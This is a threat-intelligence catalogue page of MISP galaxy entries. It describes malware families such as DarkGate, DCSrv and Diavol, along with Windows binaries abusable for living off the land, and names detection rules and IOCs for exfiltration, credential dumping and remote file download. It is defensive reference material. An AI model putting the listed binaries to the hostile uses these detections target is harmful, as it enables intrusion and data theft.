platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S0497 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DanBot
DanBot is a first-stage remote access Trojan written in C# that has been used by HEXANE since at least 2018.[SecureWorks August 2019]
Internal MISP references
UUID 131c0eb2-9191-4ccd-a2d6-5f36046a8f2f
which can be used as unique global reference for DanBot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1014 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkComet
DarkComet is a Windows remote administration tool and backdoor.[TrendMicro DarkComet Sept 2014][Malwarebytes DarkComet March 2018]
Internal MISP references
UUID 74f88899-56d0-4de8-97de-539b3590ab90
which can be used as unique global reference for DarkComet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0334 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkGate - Duplicate
DarkGate first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named "DarkGate" by its author, DarkGate is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.[Ensilo Darkgate 2018] DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.[Trellix Darkgate 2023]
Internal MISP references
UUID 39d81c48-8f7c-54cb-8fac-485598e31a55
which can be used as unique global reference for DarkGate - Duplicate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1111 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkGate
Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a 60-second tutorial here).
DarkGate is a commodity downloader. Researchers have often observed DarkGate samples making use of legitimate copies of AutoIt, a freeware BASIC-like scripting language, using it to run AutoIt scripts as part of its execution chain. Reports of DarkGate infections surged following the announcement of the disruption of the QakBot botnet by international authorities in late August 2023.[Bleeping Computer DarkGate October 14 2023] The delivery of DarkGate payloads via instant messaging platforms including Microsoft Teams and Skype was reported in September and October 2023.[DarkGate Loader delivered via Teams - Truesec][Trend Micro DarkGate October 12 2023]
Internal MISP references
UUID 7144b703-f471-4bde-bedc-e8b274854de5
which can be used as unique global reference for DarkGate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5266 |
source | Tidal Cyber |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkTortilla
DarkTortilla is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. DarkTortilla has been used to deliver popular information stealers, RATs, and payloads such as Agent Tesla, AsyncRat, NanoCore, RedLine, Cobalt Strike, and Metasploit.[Secureworks DarkTortilla Aug 2022]
Internal MISP references
UUID 35abcb6b-3259-57c1-94fc-50cfd5bde786
which can be used as unique global reference for DarkTortilla
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1066 |
source | MITRE |
type | ['malware'] |
DarkWatchman
DarkWatchman is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.[Prevailion DarkWatchman 2021]
Internal MISP references
UUID 740a0327-4caf-4d90-8b51-f3f9a4d59b37
which can be used as unique global reference for DarkWatchman
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0673 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Daserf
Daserf is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. [Trend Micro Daserf Nov 2017] [Secureworks BRONZE BUTLER Oct 2017]
Internal MISP references
UUID fad65026-57c4-4d4f-8803-87178dd4b887
which can be used as unique global reference for Daserf
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0187 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DataSvcUtil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Author: Ialle Teixeira
Paths: * C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
Resources: * https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe * https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services * https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services
Detection: * Sigma: proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml * IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. * IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.[DataSvcUtil.exe - LOLBAS Project]
Internal MISP references
UUID dd555a4c-3b04-48c1-988f-d530d699a5bf
which can be used as unique global reference for DataSvcUtil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5099 |
source | Tidal Cyber |
tags | ['0576be43-65c6-4d1a-8a06-ed8232ca0120', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DBatLoader
DBatLoader is a malware used for downloading/dropping purposes.
Internal MISP references
UUID 789791b7-1ea1-4b18-8253-4663bb7ec143
which can be used as unique global reference for DBatLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5287 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
DCSrv
DCSrv is destructive malware that has been used by Moses Staff since at least September 2021. Though DCSrv has ransomware-like capabilities, Moses Staff does not demand ransom or offer a decryption key.[Checkpoint MosesStaff Nov 2021]
Internal MISP references
UUID 26ae3cd1-6710-4807-b674-957bd67d3e76
which can be used as unique global reference for DCSrv
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1033 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DDKONG
DDKONG is a malware sample that was part of a campaign by Rancor. DDKONG was first seen used in February 2017. [Rancor Unit42 June 2018]
Internal MISP references
UUID 0657b804-a889-400a-97d7-a4989809a623
which can be used as unique global reference for DDKONG
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0255 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DEADEYE
DEADEYE is a malware launcher that has been used by APT41 since at least May 2021. DEADEYE has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).[Mandiant APT41]
Internal MISP references
UUID e9533664-90c5-5b40-a40e-a69a2eda8bc9
which can be used as unique global reference for DEADEYE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1052 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
DealersChoice
DealersChoice is a Flash exploitation framework used by APT28. [Sofacy DealersChoice]
Internal MISP references
UUID 64dc5d44-2304-4875-b517-316ab98512c2
which can be used as unique global reference for DealersChoice
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0243 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DEATHRANSOM
DEATHRANSOM is ransomware written in C that has been used since at least 2020, and has potential overlap with FIVEHANDS and HELLOKITTY.[FireEye FiveHands April 2021]
Internal MISP references
UUID 832f5ab1-1267-40c9-84ef-f32d6373be4e
which can be used as unique global reference for DEATHRANSOM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0616 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
DefaultPack
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Author: @checkymander
Paths: * C:\Program Files (x86)\Microsoft\DefaultPack\
Resources: * https://twitter.com/checkymander/status/1311509470275604480.
Detection: * Sigma: proc_creation_win_lolbin_defaultpack.yml * IOC: DefaultPack.EXE spawned an unknown process[DefaultPack.EXE - LOLBAS Project]
Internal MISP references
UUID ff25ec03-1e8d-427e-b207-1e1ecca542ec
which can be used as unique global reference for DefaultPack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5212 |
source | Tidal Cyber |
tags | ['4f7be515-680e-4375-81f6-c71c83dd440d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Defender Control
Defender Control is a tool purpose-built to disable Microsoft Defender.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID e8830cf3-53f3-4d15-858c-584589405fad
which can be used as unique global reference for Defender Control
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5029 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Denis
Denis is a Windows backdoor and Trojan used by APT32. Denis shares several similarities to the SOUNDBITE backdoor and has been used in conjunction with the Goopy backdoor.[Cybereason Oceanlotus May 2017]
Internal MISP references
UUID df4002d2-f557-4f95-af7a-9a4582fb7068
which can be used as unique global reference for Denis
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0354 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Denonia
Denonia is described as "the first malware specifically targeting Lambda", the AWS serverless computing platform. Early samples appeared to possess cryptomining capabilities, but researchers believe Denonia could be used to carry out other types of activities as well.[Cado Denonia April 3 2022]
Internal MISP references
UUID 3c14ea0a-c85f-41b3-acd0-15d2565e3e07
which can be used as unique global reference for Denonia
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['IaaS'] |
software_attack_id | S5313 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2e5f6e4a-4579-46f7-9997-6923180815dd', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Derusbi
Derusbi is malware used by multiple Chinese APT groups.[Novetta-Axiom][ThreatConnect Anthem] Both Windows and Linux variants have been observed.[Fidelis Turbo]
Internal MISP references
UUID 9222aa77-922e-43c7-89ad-71067c428fb2
which can be used as unique global reference for Derusbi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0021 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Desk
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Desktop Settings Control Panel
Author: Hai Vaknin
Paths: * C:\Windows\System32\desk.cpl * C:\Windows\SysWOW64\desk.cpl
Resources: * https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt * https://twitter.com/pabraeken/status/998627081360695297 * https://twitter.com/VakninHai/status/1517027824984547329 * https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files
Detection: * Sigma: file_event_win_new_src_file.yml * Sigma: proc_creation_win_lolbin_rundll32_installscreensaver.yml * Sigma: registry_set_scr_file_executed_by_rundll32.yml[Desk.cpl - LOLBAS Project]
Internal MISP references
UUID 1863a7e2-6212-48a0-b109-15d0198b93e2
which can be used as unique global reference for Desk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5188 |
source | Tidal Cyber |
tags | ['7ad2b1d5-c228-4bf5-bf8e-c80a8fef0079', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Desktopimgdownldr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal
Paths: * c:\windows\system32\desktopimgdownldr.exe
Resources: * https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
Detection: * Sigma: proc_creation_win_desktopimgdownldr_susp_execution.yml * Sigma: file_event_win_susp_desktopimgdownldr_file.yml * Elastic: command_and_control_remote_file_copy_desktopimgdownldr.toml * IOC: desktopimgdownldr.exe that creates non-image file * IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl[Desktopimgdownldr.exe - LOLBAS Project]
Internal MISP references
UUID 1b31652d-30bb-4c6e-bfe1-f2921a0aa64e
which can be used as unique global reference for Desktopimgdownldr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5100 |
source | Tidal Cyber |
tags | ['acc0e091-a071-4e83-b0b1-4f3adebeafa3', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DeviceCredentialDeployment
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Device Credential Deployment
Author: Elliot Killick
Paths: * C:\Windows\System32\DeviceCredentialDeployment.exe
Resources: None Provided
Detection: * IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation * Sigma: proc_creation_win_lolbin_device_credential_deployment.yml[DeviceCredentialDeployment.exe - LOLBAS Project]
Internal MISP references
UUID b99bdf39-8dcf-4bae-95af-b029d48cb579
which can be used as unique global reference for DeviceCredentialDeployment
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5101 |
source | Tidal Cyber |
tags | ['2a08c2eb-e90e-4bdb-a2dd-9da06de7ed25', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Devinit
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Visual Studio 2019 tool
Author: mr.d0x
Paths: * C:\Program Files\Microsoft Visual Studio*\Community\Common7\Tools\devinit\devinit.exe * C:\Program Files (x86)\Microsoft Visual Studio*\Community\Common7\Tools\devinit\devinit.exe
Resources: * https://twitter.com/mrd0x/status/1460815932402679809
Detection: * Sigma: proc_creation_win_devinit_lolbin_usage.yml[Devinit.exe - LOLBAS Project]
Internal MISP references
UUID 102714a0-6b18-4d05-83c2-dd2929ce685a
which can be used as unique global reference for Devinit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5213 |
source | Tidal Cyber |
tags | ['bb814941-0155-49b1-8f93-39626d4f0ddd', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Devtoolslauncher
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: felamos
Paths: * c:\windows\system32\devtoolslauncher.exe
Resources: * https://twitter.com/_felamos/status/1179811992841797632
Detection: * Sigma: proc_creation_win_lolbin_devtoolslauncher.yml * IOC: DeveloperToolsSvc.exe spawned an unknown process[Devtoolslauncher.exe - LOLBAS Project]
Internal MISP references
UUID 6e213e33-c2e5-494f-bc1a-bf672f95dcf8
which can be used as unique global reference for Devtoolslauncher
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5214 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
devtunnel
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to enable forwarded ports on windows operating systems.
Author: Kamran Saifullah
Paths:
* C:\Users\
Resources: * https://code.visualstudio.com/docs/editor/port-forwarding
Detection: * IOC: devtunnel.exe binary spawned * IOC: .devtunnels.ms * IOC: .*.devtunnels.ms * Analysis: https://cydefops.com/vscode-data-exfiltration[devtunnel.exe - LOLBAS Project]
Internal MISP references
UUID 672d80fe-656e-4b1b-8234-ebf2c5339166
which can be used as unique global reference for devtunnel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5252 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DEWMODE
According to joint Cybersecurity Advisory AA23-158A (June 2023), DEWMODE is a web shell written in PHP that is designed to interact with a MySQL database. During a campaign from 2020 to 2021, threat actors exploited multiple zero-day vulnerabilities in internet-facing Accellion File Transfer Appliance (FTA) devices, installing DEWMODE web shells to exfiltrate data from compromised networks.[Mandiant MOVEit Transfer June 2 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/dewmode/
Internal MISP references
UUID ff0b0792-5dd0-4e10-8b84-8da93a0198aa
which can be used as unique global reference for DEWMODE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux'] |
software_attack_id | S5021 |
source | Tidal Cyber |
tags | ['a98d7a43-f227-478e-81de-e7299639a355', '311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Dfshim
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: ClickOnce engine in Windows used by .NET
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Dfshim.dll - LOLBAS Project]
Internal MISP references
UUID b396eb52-3b6a-44e9-9534-d8b981a52192
which can be used as unique global reference for Dfshim
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5189 |
source | Tidal Cyber |
tags | ['91fd24c3-f371-4c3b-b997-cd85e25c0967', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Dfsvc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: ClickOnce engine in Windows used by .NET
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Dfsvc.exe - LOLBAS Project]
Internal MISP references
UUID f85966ec-0c4d-4f7e-949f-bb73828bf601
which can be used as unique global reference for Dfsvc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5102 |
source | Tidal Cyber |
tags | ['18d6d91d-7df0-44c8-88fe-986d9ba00b8d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Diantz
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary that package existing files into a cabinet (.cab) file
Author: Tamir Yehuda
Paths: * c:\windows\system32\diantz.exe * c:\windows\syswow64\diantz.exe
Resources: * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
Detection: * Sigma: proc_creation_win_lolbin_diantz_ads.yml * Sigma: proc_creation_win_lolbin_diantz_remote_cab.yml * IOC: diantz storing data into alternate data streams. * IOC: diantz getting a file from a remote machine or the internet.[diantz.exe_lolbas]
Internal MISP references
UUID 054ddf05-e9f0-4d14-8493-2a1b2ddbefad
which can be used as unique global reference for Diantz
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5103 |
source | Tidal Cyber |
tags | ['96f9b39f-0c59-48a0-9702-01920c1293a7', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Diavol
Diavol is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. The Diavol Ransomware-as-a Service (RaaS) program is managed by Wizard Spider and it has been observed being deployed by Bazar.[Fortinet Diavol July 2021][FBI Flash Diavol January 2022][DFIR Diavol Ransomware December 2021][Microsoft Ransomware as a Service]
Internal MISP references
UUID d057b6e7-1de4-4f2f-b374-7e879caecd67
which can be used as unique global reference for Diavol
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0659 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dipsind
Dipsind is a malware family of backdoors that appear to be used exclusively by PLATINUM. [Microsoft PLATINUM April 2016]
Internal MISP references
UUID 226ee563-4d49-48c2-aa91-82999f43ce30
which can be used as unique global reference for Dipsind
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0200 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Disco
Disco is a custom implant that has been used by MoustachedBouncer since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.[MoustachedBouncer ESET August 2023]
Internal MISP references
UUID 194314e3-4edc-5346-96b6-d2d7bf5d830a
which can be used as unique global reference for Disco
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1088 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Diskshadow
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Author: Oddvar Moe
Paths: * C:\Windows\System32\diskshadow.exe * C:\Windows\SysWOW64\diskshadow.exe
Detection: * Sigma: proc_creation_win_lolbin_diskshadow.yml * Sigma: proc_creation_win_susp_shadow_copies_deletion.yml * Elastic: credential_access_cmdline_dump_tool.toml * IOC: Child process from diskshadow.exe[Diskshadow.exe - LOLBAS Project]
Internal MISP references
UUID 07c49566-5bea-44dc-b81f-e6c90bda9c39
which can be used as unique global reference for Diskshadow
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5104 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Dnscmd
Dnscmd is a Windows command-line utility used to manage DNS servers.[Dnscmd Microsoft]
Internal MISP references
UUID 3fd09997-86e0-4dce-935e-421863e9bad0
which can be used as unique global reference for Dnscmd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5016 |
source | Tidal Cyber |
tags | ['a45f9597-09c4-4e70-a7d3-d8235d2451a3', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
DnsSystem
DnsSystem is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by HEXANE since at least June 2022.[Zscaler Lyceum DnsSystem June 2022]
Internal MISP references
UUID e69a913d-4ddc-4d69-9961-25a31cae5899
which can be used as unique global reference for DnsSystem
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1021 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
dnx
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: .Net Execution environment file included with .Net.
Author: Oddvar Moe
Paths: * N/A
Resources: * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Detection: * Sigma: proc_creation_win_lolbin_dnx.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[dnx.exe - LOLBAS Project]
Internal MISP references
UUID e2bdda2e-54b4-4d35-b7e5-4e20626a4481
which can be used as unique global reference for dnx
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5215 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DOGCALL
DOGCALL is a backdoor used by APT37 that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 81ce23c0-f505-4d75-9928-4fbd627d3bc2
which can be used as unique global reference for DOGCALL
in MISP communities and other software using the MISP galaxy
Associated metadata
